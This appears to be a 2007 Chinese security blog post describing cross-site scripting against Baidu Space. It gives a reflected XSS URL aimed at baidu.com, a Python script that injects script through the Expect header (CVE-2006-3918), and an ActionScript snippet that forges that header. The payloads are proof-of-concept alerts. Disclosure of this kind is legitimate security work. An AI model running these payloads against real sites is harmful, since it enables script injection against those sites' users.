Nov 14

最近流行的百度空间xxs

网络安全 Add comments

1. 灌水

  1. http://www.baidu.com/index.php?tn="><script>alert('xxs')</script>

2. hi.baidu.com XXS

  1. #! /usr/bin/python
  2. #coding=gb2312
  3.  
  4. from httplib import HTTPConnection
  5.  
  6. conn = HTTPConnection('hi.baidu.com', 80)
  7. conn.putrequest('GET', '/')
  8. conn.putheader('Host', 'hi.baidu.com')
  9. conn.putheader('Content-Type', 'text/xml; charset=”utf-8″')
  10. conn.putheader('Expect', '<body onload=window.open("http://www.google.com")>')
  11. conn.endheaders()
  12. r = conn.getresponse()
  13. print r.read()

利用的漏洞是 CVE-2006-3918
http://www.securityfocus.com/bid/19661

构造swf 可以利用此漏洞

  1. var req:LoadVars=new LoadVars();
  2. req.addRequestHeader("Expect",
  3. "<script>alert('gotcha!')</script>");
  4. req.send("http://www.target.site/","_blank","GET");

BTW: wordpress 这个写日志的地方也跨站了 -__-

2 Responses to “最近流行的百度空间xxs”

  1. jun0717 Says:
    11月 26th, 2007 at 10:24 pm

      做个记号,呵呵~

  2. anhun Says:
    11月 27th, 2007 at 12:31 am

    汗,还以为是百度的脚本问题

Leave a Reply

You must be logged in to post a comment.

Thx N.Design Studio for this Theme
Entries RSS Comments RSS Log in